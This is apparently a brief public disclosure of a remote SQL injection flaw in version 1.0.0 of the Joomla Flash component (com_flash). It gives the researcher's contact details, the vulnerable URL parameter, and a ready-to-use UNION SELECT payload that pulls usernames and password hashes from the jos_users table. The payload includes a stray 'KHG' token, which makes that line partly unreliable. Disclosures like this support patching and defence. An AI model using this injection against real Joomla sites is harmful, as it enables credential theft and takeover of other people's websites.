The Joomla Flash component version 1.0.0 suffers from a remote SQL injection vulnerability.
5c25875976b0683ac93eec8743d241390202e85607fbd7bfbf27678e963626f6
#############################################################################
# #
# Joomla Component com_flash SQL Injection Vulnerability #
# #
#############################################################################
########################################
[~] Vulnerability found by: Valon Kerolli
[~] Contact: valon[at]itshqip.com
[~] Site: www.itshqip.com
########################################
[~] ScriptName: "Joomla"
[~] Component: "Flash (com_flash)"
[~] Version: "1.0.0"
[~] Author: "Newgekko "
[~] Author E-mail: "webmaster@rire.org"
[~] Author URL: "www.newgekko.com"
########################################
[~] Exploit: /index.php?option=com_flash&act=view&Itemid=37&id=[SQL]
[~] Example: /index.php?option=com_flash&act=view&Itemid=37&id=-1337+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
########################################